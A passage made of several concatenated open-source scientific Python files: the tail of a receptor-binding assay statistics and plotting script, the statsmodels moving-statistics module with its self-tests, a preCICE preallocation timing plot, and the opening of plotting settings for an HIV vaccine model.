    Column names are of the form "<compound> <suffix>"; only the first
    word identifies the compound.  Returns
    ``{compound: [count_in_df1, count_in_df2, ...]}``.
    """
    all_counts = {}
    for frame in data_dfs:
        for full_name, count in Counter(frame.columns).items():
            compound = full_name.split()[0]
            all_counts.setdefault(compound, []).append(count)
    return all_counts
def compute_exp_statistics(data_dfs, fit_dfs, pool_fit_df=None, precision=4):
    """Summarize binding experiments as a per-compound table.

    Parameters
    ----------
    data_dfs : list of DataFrame
        Raw data frames, one per experiment (columns are replicates).
    fit_dfs : list of DataFrame
        Per-experiment fit tables indexed by row group (e.g.
        "Best-fit values") with a "logKi" row.
    pool_fit_df : DataFrame, optional
        Pooled fit table; adds "Pooled LogKi"/"Pooled Ki (nM)"/"Pooled
        LogIC50" columns when given.
    precision : int
        Decimal places in the formatted "mean +/- std" strings.

    Returns
    -------
    DataFrame with one row per compound.
    """
    d = {}
    for name, rep_counts in count_replicates(data_dfs).items():
        d.setdefault("Compound", []).append(name)
        rep_counts = sorted(rep_counts)
        exp_count = len(rep_counts)
        exp_count_str = "{:d} ({:s})".format(exp_count,
                                             ", ".join(map(str, rep_counts)))
        d.setdefault("Experiment Number", []).append(exp_count_str)
    # Collect the fitted logKi of every compound across experiments.
    logKis = {}
    for df in fit_dfs:
        df = df.loc["Best-fit values"]
        for col in df.columns:
            if 'Global' in col:
                continue
            name = col.split()[0]
            logKi = df[col].loc["logKi"]
            logKis.setdefault(name, []).append(logKi)
    for name in d.get("Compound", []):
        try:
            vals = logKis[name]
            logKi_mean, logKi_std = np.mean(vals), np.std(vals)
            logKi_str = "{1:.{0:d}f} +/- {2:.{0:d}f}".format(
                precision, logKi_mean, logKi_std)
        except KeyError:
            # No fitted logKi for this compound.  (The original also
            # recomputed np.mean(vals) here from the *previous*
            # iteration's stale `vals` -- a bug; the values were unused.)
            logKi_str = np.nan
        d.setdefault("Mean LogKi", []).append(logKi_str)
    df = pd.DataFrame.from_dict(d)
    if pool_fit_df is not None:
        pooled_logKis = []
        pooled_logIC50s = []
        pooled_Kis = []
        for name in df['Compound']:
            if name not in pool_fit_df.columns:
                pooled_logIC50s.append(np.nan)
                pooled_logKis.append(np.nan)
                pooled_Kis.append(np.nan)
                continue
            try:
                logKi = float(
                    pool_fit_df[name].loc['Best-fit values'].loc['logKi'])
                logKi_std = float(
                    pool_fit_df[name].loc['Std. Error'].loc['logKi'])
                pooled_logKis.append("{1:.{0:d}f} +/- {2:.{0:d}f}".format(
                    precision, logKi, logKi_std))
                # logKi is log10 of Ki in molar; report Ki in nM.
                pooled_Kis.append(10**logKi * 1e9)
                pooled_logIC50s.append(np.nan)
            except KeyError:
                # No logKi row: fall back to the fitted LogIC50.
                logIC50 = float(
                    pool_fit_df[name].loc['Best-fit values'].loc['LogIC50'])
                logIC50_std = float(
                    pool_fit_df[name].loc['Std. Error'].loc['LogIC50'])
                pooled_logIC50s.append("{1:.{0:d}f} +/- {2:.{0:d}f}".format(
                    precision, logIC50, logIC50_std))
                pooled_logKis.append(np.nan)
                pooled_Kis.append(np.nan)
        df['Pooled LogKi'] = pooled_logKis
        df['Pooled Ki (nM)'] = pooled_Kis
        df['Pooled LogIC50'] = pooled_logIC50s
    return df
if __name__ == "__main__":
    # Read binding data
    # Individual replicate experiments and the pooled (global) fits are
    # kept separate; the pooled files contain one experiment per target.
    binding_data = read_files(BINDING_DATA_FILES)
    pooled_binding_data = read_files(BINDING_POOL_DATA_FILES, expect_one=True)
    # Save binding pooled table
    exp_stats_dfs = []
    for target in pooled_binding_data:
        data_dfs = [x[1] for x in binding_data[target]]
        fit_dfs = [x[2] for x in binding_data[target]]
        exp_stats_df = compute_exp_statistics(
            data_dfs, fit_dfs, pool_fit_df=pooled_binding_data[target][2])
        exp_stats_df['Target'] = target
        exp_stats_dfs.append(exp_stats_df)
    exp_stats_df = pd.concat(exp_stats_dfs, axis=0)
    exp_stats_df = exp_stats_df[['Target', 'Compound', 'Experiment Number',
                                 'Mean LogKi', 'Pooled LogKi',
                                 'Pooled Ki (nM)', 'Pooled LogIC50']]
    exp_stats_df.sort_values(by=['Target', 'Compound'], inplace=True)
    exp_stats_df.set_index(['Target', 'Compound'], inplace=True)
    exp_stats_df.to_csv(BINDING_TABLE_FILE, sep='\t')
    # Plot radioligand assays
    for target_family, target_sub in BINDING_STRING_MATCH.items():
        targets = sorted([x for x in pooled_binding_data if target_sub in x])
        if len(targets) == 0:
            continue
        # Two panels per row.
        num_subplots = len(targets)
        num_rows = math.ceil(num_subplots / 2.)
        fig = plt.figure(figsize=(5.8, 2.5 * num_rows))
        for i, target in enumerate(targets):
            exp_name, data_df, fit_df = pooled_binding_data[target]
            # Values far above 100% indicate un-normalized data.
            if np.nanmax(np.abs(data_df)) > 150:
                normalize = True
            else:
                normalize = False
            ax = fig.add_subplot(num_rows, 2, i + 1)
            title = TARGET_NAME_FORMAT.get(target, target)
            plot_experiments(data_df, ax, fit_df=fit_df.loc['Best-fit values'],
                             colors_dict=colors.mol_colors,
                             invert=True, normalize=normalize, title=title,
                             ylabel="Specific Binding (%)")
        sns.despine(fig=fig, offset=10)
        add_panel_labels(fig=fig, xoffset=.21)
        fig.tight_layout()
        fig.savefig(BINDING_BASENAMES[target_family] + ".png", dpi=300)
        fig.savefig(BINDING_BASENAMES[target_family] + ".tif", dpi=300)
    # Plot Tango results
    target_data_fit = read_files(TANGO_POOL_DATA_FILES, expect_one=True)
    num_subplots = len(target_data_fit)
    num_rows = math.ceil(num_subplots / 2.)
    fig = plt.figure(figsize=(7, 3 * num_rows))
    for i, (target, (exp_name, data_df, fit_df)) in enumerate(
            sorted(target_data_fit.items())):
        if np.nanmax(np.abs(data_df)) > 150:
            normalize = True
        else:
            normalize = False
        ax = fig.add_subplot(num_rows, 2, i + 1)
        title = TARGET_NAME_FORMAT.get(target, target)
        try:
            fit_df = fit_df.loc['Best-fit values']
        except AttributeError:
            # No fit table available for this target.
            fit_df = None
        plot_experiments(data_df, ax, fit_df=fit_df,
                         colors_dict=colors.mol_colors, invert=False,
                         normalize=normalize, title=title,
                         ylabel="Relative Response (%)")
    sns.despine(fig=fig, offset=10)
    add_panel_labels(fig=fig)
    fig.tight_layout()
    fig.savefig(TANGO_BASENAME + ".png", dpi=300)
    fig.savefig(TANGO_BASENAME + ".tif", dpi=300)
    # Plot antagonist results
    target_data_fit = read_files(ANTAGONIST_POOL_DATA_FILES, sort_cols=False)
    for target, dfs_list in target_data_fit.items():
        num_subplots = len(dfs_list)
        num_rows = 2 * math.ceil(num_subplots / 2.)
        fig = plt.figure(figsize=(7, 3 * num_rows))
        for i, (exp_name, data_df, fit_df) in enumerate(dfs_list):
            # Column labels are antagonist concentrations.
            convert_columns_to_type(data_df, float)
            convert_columns_to_type(fit_df, float)
            unique_cols = sorted(set(data_df.columns))
            # Grayscale ramp: one shade per antagonist concentration.
            colors_dict = dict(zip(
                unique_cols,
                np.tile(np.linspace(0, .75, len(unique_cols)), (3, 1)).T))
            ax = fig.add_subplot(num_rows, 2, 2 * i + 1)
            if "ACh" in exp_name:
                title = "Against Acetylcholine"
            elif "CCh" in exp_name:
                title = "Against Carbachol"
            try:
                fit_df = fit_df.loc['Best-fit values']
            except AttributeError:
                fit_df = None
            plot_experiments(data_df, ax, fit_df=fit_df,
                             colors_dict=colors_dict, invert=False,
                             normalize=True, title=title,
                             ylabel="Relative Activity (%)")
            # Schild regression panel next to each dose-response panel.
            ax = fig.add_subplot(num_rows, 2, 2 * i + 2)
            plot_schild(fit_df, ax)
        add_panel_labels(fig=fig)
        sns.despine(fig=fig, offset=10)
        fig.tight_layout()
        fig.savefig(ANTAGONIST_BASENAMES[target] + ".png", dpi=300)
        fig.savefig(ANTAGONIST_BASENAMES[target] + ".tif", dpi=300)
| lgpl-3.0 |
waynenilsen/statsmodels | statsmodels/sandbox/tsa/movstat.py | 34 | 14871 | '''using scipy signal and numpy correlate to calculate some time series
statistics
original developer notes
see also scikits.timeseries (movstat is partially inspired by it)
added 2009-08-29
timeseries moving stats are in c, autocorrelation similar to here
I thought I saw moving stats somewhere in python, maybe not)
TODO
moving statistics
- filters don't handle boundary conditions nicely (correctly ?)
e.g. minimum order filter uses 0 for out of bounds value
-> append and prepend with last resp. first value
- enhance for nd arrays, with axis = 0
Note: Equivalence for 1D signals
>>> np.all(signal.correlate(x,[1,1,1],'valid')==np.correlate(x,[1,1,1]))
True
>>> np.all(ndimage.filters.correlate(x,[1,1,1], origin = -1)[:-3+1]==np.correlate(x,[1,1,1]))
True
# multidimensional, but, it looks like it uses common filter across time series, no VAR
ndimage.filters.correlate(np.vstack([x,x]),np.array([[1,1,1],[0,0,0]]), origin = 1)
ndimage.filters.correlate(x,[1,1,1],origin = 1))
ndimage.filters.correlate(np.vstack([x,x]),np.array([[0.5,0.5,0.5],[0.5,0.5,0.5]]), \
origin = 1)
>>> np.all(ndimage.filters.correlate(np.vstack([x,x]),np.array([[1,1,1],[0,0,0]]), origin = 1)[0]==\
ndimage.filters.correlate(x,[1,1,1],origin = 1))
True
>>> np.all(ndimage.filters.correlate(np.vstack([x,x]),np.array([[0.5,0.5,0.5],[0.5,0.5,0.5]]), \
origin = 1)[0]==ndimage.filters.correlate(x,[1,1,1],origin = 1))
update
2009-09-06: cosmetic changes, rearrangements
'''
from __future__ import print_function
import numpy as np
from scipy import signal
from numpy.testing import assert_array_equal, assert_array_almost_equal
import statsmodels.api as sm
def expandarr(x, k):
    '''Pad *x* with k copies of its first and last entries (rows if 2-D).

    Used so that moving-window filters have sensible boundary values
    instead of zeros.
    '''
    pad_shape = k
    if np.ndim(x) == 2:
        pad_shape = (k, np.shape(x)[1])
    left = np.ones(pad_shape) * x[0]
    right = np.ones(pad_shape) * x[-1]
    return np.concatenate((left, x, right))
def movorder(x, order='med', windsize=3, lag='lagged'):
    '''moving order statistics

    Parameters
    ----------
    x : array
        time series data
    order : float or 'med', 'min', 'max'
        which order statistic to calculate
    windsize : int
        window size
    lag : 'lagged', 'centered', or 'leading'
        location of window relative to current position

    Returns
    -------
    filtered array

    Notes
    -----
    Fixes vs. original: the string options are tested *before*
    ``np.isfinite`` (which raises TypeError on strings in modern numpy),
    the median rank uses integer division (``/`` produced a float rank
    under Python 3), and the builtin name ``ord`` is no longer shadowed.
    '''
    #if windsize is even should it raise ValueError
    if lag == 'lagged':
        lead = windsize//2
    elif lag == 'centered':
        lead = 0
    elif lag == 'leading':
        lead = -windsize//2 + 1
    else:
        raise ValueError("lag must be 'lagged', 'centered' or 'leading'")
    # Rank of the order statistic within the window (must be an int).
    if order == 'med':
        rank = (windsize - 1) // 2
    elif order == 'min':
        rank = 0
    elif order == 'max':
        rank = windsize - 1
    elif np.isfinite(order):
        rank = int(order)
    else:
        raise ValueError("order must be finite or 'med', 'min' or 'max'")
    # Pad so the boundary windows see repeated end values, not zeros.
    xext = expandarr(x, windsize)
    return signal.order_filter(xext, np.ones(windsize),
                               rank)[windsize-lead:-(windsize+lead)]
def check_movorder():
    '''graphical test for movorder'''
    import matplotlib.pylab as plt

    # Moving max of an increasing series is the series itself.
    increasing = np.arange(1, 10)
    assert_array_equal(movorder(increasing, order='max'), increasing)

    # Likewise moving min of a decreasing series.
    decreasing = np.arange(10, 1, -1)
    assert_array_equal(movorder(decreasing, order='min'), decreasing)
    assert_array_equal(movorder(decreasing, order='min', lag='centered')[:-1],
                       decreasing[1:])

    # Visual check on a smooth signal, one figure per lag mode.
    tt = np.linspace(0, 2*np.pi, 15)
    xx = np.sin(tt) + 1
    for lagmode in ('lagged', 'centered', 'leading'):
        smoothed = movorder(xx, order='max', lag=lagmode)
        plt.figure()
        plt.plot(tt, xx, '.-', tt, smoothed, '.-')
        plt.title('moving max ' + lagmode)
# identity filter
##>>> signal.order_filter(x,np.ones(1),0)
##array([ 1., 2., 3., 4., 5., 6., 7., 8., 9.])
# median filter
##signal.medfilt(np.sin(x), kernel_size=3)
##>>> plt.figure()
##<matplotlib.figure.Figure object at 0x069BBB50>
##>>> x=np.linspace(0,3,100);plt.plot(x,np.sin(x),x,signal.medfilt(np.sin(x), kernel_size=3))
# remove old version
##def movmeanvar(x, windowsize=3, valid='same'):
## '''
## this should also work along axis or at least for columns
## '''
## n = x.shape[0]
## x = expandarr(x, windowsize - 1)
## takeslice = slice(windowsize-1, n + windowsize-1)
## avgkern = (np.ones(windowsize)/float(windowsize))
## m = np.correlate(x, avgkern, 'same')#[takeslice]
## print(m.shape)
## print(x.shape)
## xm = x - m
## v = np.correlate(x*x, avgkern, 'same') - m**2
## v1 = np.correlate(xm*xm, avgkern, valid) #not correct for var of window
###>>> np.correlate(xm*xm,np.array([1,1,1])/3.0,'valid')-np.correlate(xm*xm,np.array([1,1,1])/3.0,'valid')**2
## return m[takeslice], v[takeslice], v1
def movmean(x, windowsize=3, lag='lagged'):
    '''moving window mean

    Thin wrapper: the mean is the first non-central moment.

    Parameters
    ----------
    x : array
        time series data
    windowsize : int
        window size
    lag : 'lagged', 'centered', or 'leading'
        location of window relative to current position

    Returns
    -------
    mk : array
        moving mean, with same shape as x

    Notes
    -----
    At the boundaries, x is extended with its first resp. last value.
    '''
    return movmoment(x, 1, windowsize=windowsize, lag=lag)
def movvar(x, windowsize=3, lag='lagged'):
    '''moving window variance

    Computed as E[x^2] - E[x]^2 from the first two moving moments.

    Parameters
    ----------
    x : array
        time series data
    windowsize : int
        window size
    lag : 'lagged', 'centered', or 'leading'
        location of window relative to current position

    Returns
    -------
    mk : array
        moving variance, with same shape as x

    '''
    first_moment = movmoment(x, 1, windowsize=windowsize, lag=lag)
    second_moment = movmoment(x, 2, windowsize=windowsize, lag=lag)
    return second_moment - first_moment * first_moment
def movmoment(x, k, windowsize=3, lag='lagged'):
    '''k-th moving non-central moment

    Parameters
    ----------
    x : array
        time series data
    k : int
        order of the (non-central) moment, e.g. 1 for the mean
    windowsize : int
        window size
    lag : 'lagged', 'centered', or 'leading'
        location of window relative to current position

    Returns
    -------
    mk : array
        k-th moving non-central moment, with same shape as x

    Notes
    -----
    If data x is 2d, then the moving moment is calculated for each
    column.  Fix vs. original: leftover debug ``print()`` calls that
    polluted stdout on every call have been removed.
    '''
    windsize = windowsize
    #if windsize is even should it raise ValueError
    # `lead` and the slice `sl` trim the padded, full-correlation output
    # back to the length of x for each window alignment.
    if lag == 'lagged':
        lead = -0
        sl = slice((windsize-1) or None, -2*(windsize-1) or None)
    elif lag == 'centered':
        lead = -windsize//2
        sl = slice((windsize-1)+windsize//2 or None,
                   -(windsize-1)-windsize//2 or None)
    elif lag == 'leading':
        lead = -windsize + 2
        sl = slice(2*(windsize-1)+1+lead or None,
                   -(2*(windsize-1)+lead)+1 or None)
    else:
        raise ValueError("lag must be 'lagged', 'centered' or 'leading'")
    avgkern = (np.ones(windowsize)/float(windowsize))
    # expandarr pads (windsize-1) values onto each end.
    xext = expandarr(x, windsize-1)
    if xext.ndim == 1:
        return np.correlate(xext**k, avgkern, 'full')[sl]
    else:
        # 2d: apply the same averaging kernel down each column.
        return signal.correlate(xext**k, avgkern[:, None], 'full')[sl, :]
#x=0.5**np.arange(10);xm=x-x.mean();a=np.correlate(xm,[1],'full')
#x=0.5**np.arange(3);np.correlate(x,x,'same')
##>>> x=0.5**np.arange(10);xm=x-x.mean();a=np.correlate(xm,xo,'full')
##
##>>> xo=np.ones(10);d=np.correlate(xo,xo,'full')
##>>> xo
##xo=np.ones(10);d=np.correlate(xo,xo,'full')
##>>> x=np.ones(10);xo=x-x.mean();a=np.correlate(xo,xo,'full')
##>>> xo=np.ones(10);d=np.correlate(xo,xo,'full')
##>>> d
##array([ 1., 2., 3., 4., 5., 6., 7., 8., 9., 10., 9.,
## 8., 7., 6., 5., 4., 3., 2., 1.])
##def ccovf():
## pass
## #x=0.5**np.arange(10);xm=x-x.mean();a=np.correlate(xm,xo,'full')
__all__ = ['movorder', 'movmean', 'movvar', 'movmoment']
if __name__ == '__main__':
    # Self-test / demo: compare the moving statistics against hand-computed
    # values and hard-coded regression fixtures.
    print('\ncheckin moving mean and variance')
    nobs = 10
    x = np.arange(nobs)
    ws = 3
    # Expected moving mean of arange(10), window 3, including the padded
    # ramp-up/ramp-down values at the boundaries.
    ave = np.array([ 0., 1/3., 1., 2., 3., 4., 5., 6., 7., 8.,
                   26/3., 9])
    # Expected moving variance for x (column 0) and 2*x (column 1).
    va = np.array([[ 0.        ,  0.        ],
                   [ 0.22222222,  0.88888889],
                   [ 0.66666667,  2.66666667],
                   [ 0.66666667,  2.66666667],
                   [ 0.66666667,  2.66666667],
                   [ 0.66666667,  2.66666667],
                   [ 0.66666667,  2.66666667],
                   [ 0.66666667,  2.66666667],
                   [ 0.66666667,  2.66666667],
                   [ 0.66666667,  2.66666667],
                   [ 0.22222222,  0.88888889],
                   [ 0.        ,  0.        ]])
    ave2d = np.c_[ave, 2*ave]
    print(movmean(x, windowsize=ws, lag='lagged'))
    print(movvar(x, windowsize=ws, lag='lagged'))
    print([np.var(x[i-ws:i]) for i in range(ws, nobs)])
    m1 = movmoment(x, 1, windowsize=3, lag='lagged')
    m2 = movmoment(x, 2, windowsize=3, lag='lagged')
    print(m1)
    print(m2)
    print(m2 - m1*m1)
    # this implicitly also tests moment
    assert_array_almost_equal(va[ws-1:,0],
                              movvar(x, windowsize=3, lag='leading'))
    assert_array_almost_equal(va[ws//2:-ws//2+1,0],
                              movvar(x, windowsize=3, lag='centered'))
    assert_array_almost_equal(va[:-ws+1,0],
                              movvar(x, windowsize=ws, lag='lagged'))
    print('\nchecking moving moment for 2d (columns only)')
    x2d = np.c_[x, 2*x]
    print(movmoment(x2d, 1, windowsize=3, lag='centered'))
    print(movmean(x2d, windowsize=ws, lag='lagged'))
    print(movvar(x2d, windowsize=ws, lag='lagged'))
    assert_array_almost_equal(va[ws-1:,:],
                              movvar(x2d, windowsize=3, lag='leading'))
    assert_array_almost_equal(va[ws//2:-ws//2+1,:],
                              movvar(x2d, windowsize=3, lag='centered'))
    assert_array_almost_equal(va[:-ws+1,:],
                              movvar(x2d, windowsize=ws, lag='lagged'))
    assert_array_almost_equal(ave2d[ws-1:],
                              movmoment(x2d, 1, windowsize=3, lag='leading'))
    assert_array_almost_equal(ave2d[ws//2:-ws//2+1],
                              movmoment(x2d, 1, windowsize=3, lag='centered'))
    assert_array_almost_equal(ave2d[:-ws+1],
                              movmean(x2d, windowsize=ws, lag='lagged'))
    # Cross-check the column-wise averaging against scipy.ndimage.
    from scipy import ndimage
    print(ndimage.filters.correlate1d(x2d, np.array([1,1,1])/3., axis=0))
    #regression test check
    # Hard-coded regression fixtures: moving mean of arange(100) for
    # window 10 (lagged, leading) and window 11 (centered).
    xg = np.array([  0. ,   0.1,   0.3,   0.6,   1. ,   1.5,   2.1,   2.8,   3.6,
                     4.5,   5.5,   6.5,   7.5,   8.5,   9.5,  10.5,  11.5,  12.5,
                    13.5,  14.5,  15.5,  16.5,  17.5,  18.5,  19.5,  20.5,  21.5,
                    22.5,  23.5,  24.5,  25.5,  26.5,  27.5,  28.5,  29.5,  30.5,
                    31.5,  32.5,  33.5,  34.5,  35.5,  36.5,  37.5,  38.5,  39.5,
                    40.5,  41.5,  42.5,  43.5,  44.5,  45.5,  46.5,  47.5,  48.5,
                    49.5,  50.5,  51.5,  52.5,  53.5,  54.5,  55.5,  56.5,  57.5,
                    58.5,  59.5,  60.5,  61.5,  62.5,  63.5,  64.5,  65.5,  66.5,
                    67.5,  68.5,  69.5,  70.5,  71.5,  72.5,  73.5,  74.5,  75.5,
                    76.5,  77.5,  78.5,  79.5,  80.5,  81.5,  82.5,  83.5,  84.5,
                    85.5,  86.5,  87.5,  88.5,  89.5,  90.5,  91.5,  92.5,  93.5,
                    94.5])
    assert_array_almost_equal(xg, movmean(np.arange(100), 10,'lagged'))
    xd = np.array([  0.3,   0.6,   1. ,   1.5,   2.1,   2.8,   3.6,   4.5,   5.5,
                     6.5,   7.5,   8.5,   9.5,  10.5,  11.5,  12.5,  13.5,  14.5,
                    15.5,  16.5,  17.5,  18.5,  19.5,  20.5,  21.5,  22.5,  23.5,
                    24.5,  25.5,  26.5,  27.5,  28.5,  29.5,  30.5,  31.5,  32.5,
                    33.5,  34.5,  35.5,  36.5,  37.5,  38.5,  39.5,  40.5,  41.5,
                    42.5,  43.5,  44.5,  45.5,  46.5,  47.5,  48.5,  49.5,  50.5,
                    51.5,  52.5,  53.5,  54.5,  55.5,  56.5,  57.5,  58.5,  59.5,
                    60.5,  61.5,  62.5,  63.5,  64.5,  65.5,  66.5,  67.5,  68.5,
                    69.5,  70.5,  71.5,  72.5,  73.5,  74.5,  75.5,  76.5,  77.5,
                    78.5,  79.5,  80.5,  81.5,  82.5,  83.5,  84.5,  85.5,  86.5,
                    87.5,  88.5,  89.5,  90.5,  91.5,  92.5,  93.5,  94.5,  95.4,
                    96.2,  96.9,  97.5,  98. ,  98.4,  98.7,  98.9,  99. ])
    assert_array_almost_equal(xd, movmean(np.arange(100), 10,'leading'))
    xc = np.array([  1.36363636,   1.90909091,   2.54545455,   3.27272727,
                     4.09090909,   5.        ,   6.        ,   7.        ,
                     8.        ,   9.        ,  10.        ,  11.        ,
                    12.        ,  13.        ,  14.        ,  15.        ,
                    16.        ,  17.        ,  18.        ,  19.        ,
                    20.        ,  21.        ,  22.        ,  23.        ,
                    24.        ,  25.        ,  26.        ,  27.        ,
                    28.        ,  29.        ,  30.        ,  31.        ,
                    32.        ,  33.        ,  34.        ,  35.        ,
                    36.        ,  37.        ,  38.        ,  39.        ,
                    40.        ,  41.        ,  42.        ,  43.        ,
                    44.        ,  45.        ,  46.        ,  47.        ,
                    48.        ,  49.        ,  50.        ,  51.        ,
                    52.        ,  53.        ,  54.        ,  55.        ,
                    56.        ,  57.        ,  58.        ,  59.        ,
                    60.        ,  61.        ,  62.        ,  63.        ,
                    64.        ,  65.        ,  66.        ,  67.        ,
                    68.        ,  69.        ,  70.        ,  71.        ,
                    72.        ,  73.        ,  74.        ,  75.        ,
                    76.        ,  77.        ,  78.        ,  79.        ,
                    80.        ,  81.        ,  82.        ,  83.        ,
                    84.        ,  85.        ,  86.        ,  87.        ,
                    88.        ,  89.        ,  90.        ,  91.        ,
                    92.        ,  93.        ,  94.        ,  94.90909091,
                    95.72727273,  96.45454545,  97.09090909,  97.63636364])
    assert_array_almost_equal(xc, movmean(np.arange(100), 11,'centered'))
| bsd-3-clause |
precice/aste | plotting/plot_preallocation.py | 1 | 1968 | import json, pandas, sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
# Stacked-bar plot of preCICE/ASTE preallocation timings, one bar group
# per preallocation strategy, read from "<run>-B.timings" and "<run>.meta".
publication = True
if publication:
    import plot_helper
    plot_helper.set_save_fig_params()
fields = ["PetRBF.fillA", "PetRBF.fillC", "PetRBF.preallocA", "PetRBF.preallocC"]
# One color per timing field, evenly spaced along the default colormap.
colors = {f : c for (f, c) in zip(fields,
                                  matplotlib.cm.get_cmap()(np.linspace(0, 1, len(fields)))) }
labels = {"PetRBF.fillA" : "Filling evaluation",
          "PetRBF.fillC" : "Filling interpolation",
          "PetRBF.preallocA" : "Preallocation evaluation",
          "PetRBF.preallocC" : "Preallocation interpolation" }
ticks_labels = {"off" : "No preallocation",
                "compute" : "Explicitly computed",
                "saved" : "Computed and saved",
                "tree" : "Using of spatial tree" }
run_name = sys.argv[1] # like 2018-02-12T16:45:25.141337_testeins
participant = "B"
f_timings = "{run}-{participant}.timings".format(run = run_name, participant = participant)
info = json.load(open(run_name + ".meta"))
df = pandas.read_csv(f_timings, index_col = [0], comment = "#", parse_dates = [0])
ticks = []
x_locs = []
x = -1
for idx, time in enumerate(df.index.unique()):
    x += 1
    # Extra horizontal gap before the 5th bar group.
    if idx == 4: x += 0.3
    cdf = df.loc[time]
    # Stack the four timing fields on top of each other.
    y_bottom = 0
    for f in fields:
        y = cdf[(cdf.Name == f)].Avg.max()
        if np.isnan(y): y = 0 # When there is no Prealloc field
        plt.bar(x, y, bottom = y_bottom, color = colors[f], label = labels[f] if idx==0 else "")
        y_bottom += y
    x_locs.append(x)
    ticks.append(ticks_labels[info["preallocation"][idx]])
plt.ylabel("Time [ms]")
plt.xticks(x_locs, ticks, rotation = 20)
plt.legend()
plt.gca().yaxis.grid()
if publication:
    plot_helper.set_save_fig_params()
    # plt.gca().tick_params(axis='x', which='major', pad=15)
    plt.subplots_adjust(bottom=0.15)
    plt.savefig("preallocation_timings.pdf")
else:
    plt.show()
| gpl-3.0 |
janmedlock/HIV-95-vaccine | plots/common.py | 1 | 15852 | '''
Common plotting settings etc.
'''
import collections
import copy
import inspect
import operator
import os
import subprocess
import sys
import tempfile
import time
import unicodedata
import matplotlib
from matplotlib import cm
from matplotlib import colors
from matplotlib import ticker
from matplotlib.backends import backend_pdf
from matplotlib.backends import backend_cairo
import numpy
from PIL import Image
import seaborn
sys.path.append('..')
import model
author = 'Jan Medlock et al'
countries_to_plot = ('Global',
'India',
'Rwanda',
'South Africa',
'Swaziland',
'United States of America')
country_short_names = {
'Bolivia (Plurinational State of)': 'Bolivia',
'Democratic Republic of the Congo': 'DR Congo',
'Iran (Islamic Republic of)': 'Iran',
"Lao People's Democratic Republic": 'Laos',
'Republic of Moldova': 'Moldova',
'Russian Federation': 'Russia',
'Trinidad and Tobago': 'Trinidad & Tobago',
'United States of America': 'United States',
'United Kingdom of Great Britain and Northern Ireland': 'United Kingdom',
'United Republic of Tanzania': 'Tanzania',
'Venezuela (Bolivarian Republic of)': 'Venezuela',
}
matplotlib.rc('mathtext', fontset = 'dejavusans')
# Use Type 1 fonts instead of Type 3.
# matplotlib.rc('pdf', fonttype = 42)
# matplotlib.rc('ps', fonttype = 42)
# PNAS style
width_1column = 20.5 / 6 # inches
width_1_5column = 27 / 6 # inches
width_2column = 42.125 / 6 # inches
height_max = 54 / 6 # inches
rc_black_text = {'text.color': 'black',
'axes.labelcolor': 'black',
'xtick.color': 'black',
'ytick.color': 'black'}
matplotlib.rcParams.update(**rc_black_text)
fontdict = {'family': 'sans-serif',
'sans-serif': 'DejaVu Sans',
'size': 6}
matplotlib.rc('font', **fontdict)
matplotlib.rc('figure', titlesize = fontdict['size'] + 1)
matplotlib.rc('axes', titlesize = fontdict['size'] + 1,
labelsize = fontdict['size'] + 1)
matplotlib.rc('xtick', labelsize = fontdict['size'] - 1)
matplotlib.rc('ytick', labelsize = fontdict['size'] - 1)
matplotlib.rc('xtick.major', pad = 4)
matplotlib.rc('ytick.major', pad = 2)
matplotlib.rc('legend', fontsize = fontdict['size'],
borderpad = 0,
borderaxespad = 0)
matplotlib.rc('lines', linewidth = 1.25)
# matplotlib.rc('axes.grid', which = 'both')
matplotlib.rc('axes.grid', which = 'major')
def get_country_short_name(c):
    '''Return the short display name for country *c*, or *c* unchanged.'''
    try:
        return country_short_names[c]
    except KeyError:
        return c
all_regions = list(model.regions.regions)
# all_regions is already sorted by 'Global', then alphabetical.
all_countries = model.datasheet.get_country_list()
# all_countries needs to be sorted by the name on graph.
def country_sort_key(x):
    '''Sort key: NFKD decomposition, so accented names sort with their base letters.'''
    normal_form = 'NFKD'
    return unicodedata.normalize(normal_form, x)
all_countries.sort(key = country_sort_key)
all_regions_and_countries = all_regions + all_countries
effectiveness_measures = ['new_infections', 'incidence_per_capita',
'infected', 'dead']
t = model.simulation.t
# historical_data_start_year = 1990
historical_data_start_year = 2005
historical_data_style = dict(marker = '.',
markersize = 10,
alpha = 0.7,
color = 'black')
_parameter_names_map = dict(
coital_acts_per_year = 'Coital acts\nper year',
death_years_lost_by_suppression = 'Reduction in\nlifetime with\nviral suppression',
progression_rate_acute = 'Rate of leaving\nacute infection',
suppression_rate = 'Rate of\nviral suppression',
transmission_rate_quantile = 'Transmission\nrate',
transmission_per_coital_act_acute = 'Transmissibility\nduring\nacute phase',
transmission_per_coital_act_unsuppressed = 'Transmissibility\nafter\nacute phase',
transmission_per_coital_act_reduction_by_suppression = 'Relative\ntransmissibility\nwith\nviral suppression'
)
parameter_names = [_parameter_names_map[p]
for p in model.parameters.Parameters.get_rv_names()]
def get_country_results(country,
                        targets = model.target.all_,
                        parameters_type = 'sample'):
    '''Load simulation results for *country*, one entry per target.

    Targets whose results file is missing map to None.
    '''
    results = {}
    for target in targets:
        try:
            loaded = model.results.load(
                country, target, parameters_type = parameters_type)
        except FileNotFoundError:
            loaded = None
        results[target] = loaded
    return results
def get_filebase():
    '''Base name (path without extension) of the top-level calling script.'''
    outermost_frame = inspect.stack()[-1]
    filebase, _ = os.path.splitext(outermost_frame.filename)
    return filebase
class PercentFormatter(ticker.ScalarFormatter):
    '''ScalarFormatter that appends a percent sign to each tick label.'''

    def _set_format(self, vmin, vmax):
        # Build the base format, then splice '%%' in before any closing
        # math-mode delimiters.
        super()._set_format(vmin, vmax)
        fmt = self.format
        if self._usetex:
            self.format = fmt[:-1] + '%%$'
        elif self._useMathText:
            self.format = fmt[:-2] + '%%}$'
        else:
            self.format = fmt + '%%'
class UnitsFormatter(ticker.ScalarFormatter):
    '''Tick formatter that appends a fixed unit suffix (e.g. 'M', 'k').'''

    def __init__(self, units):
        self.units = units
        super().__init__()

    def _set_format(self, vmin, vmax):
        # Build the base format, then splice the unit suffix in before
        # any closing math-mode delimiters.
        super()._set_format(vmin, vmax)
        suffix = self.units
        if self._usetex:
            self.format = '{}{}$'.format(self.format[:-1], suffix)
        elif self._useMathText:
            self.format = '{}{}}}$'.format(self.format[:-2], suffix)
        else:
            self.format = self.format + suffix
def cmap_reflected(cmap_base):
    '''Build a colormap that runs through the reversed base map on [0, 0.5)
    and the base map on [0.5, 1], i.e. mirrored about the midpoint.'''
    # Get the name of the reversed companion colormap.
    if cmap_base.endswith('_r'):
        cmap_base_r = cmap_base[ : -2]
    else:
